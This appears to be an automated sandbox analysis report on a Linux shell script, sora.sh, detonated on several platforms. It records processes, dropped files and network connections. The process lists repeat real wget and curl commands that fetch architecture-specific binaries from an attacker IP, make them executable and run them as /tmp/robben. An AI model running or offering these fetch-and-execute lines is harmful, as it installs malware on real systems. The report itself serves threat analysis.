Analysis Overview
SHA256
19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Threat Level: Shows suspicious behavior
The file sora.sh was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-22 21:52
Signatures
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:30
Platform
debian9-mipsel-20240418-en
Max time kernel
265s
Max time network
266s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:30
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
111s
Max time network
481s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.3:443 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.98:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.97:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:31
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
96s
Max time network
479s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.48:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.18:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:20
Platform
debian12-armhf-20240221-en
Max time kernel
45s
Max time network
605s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
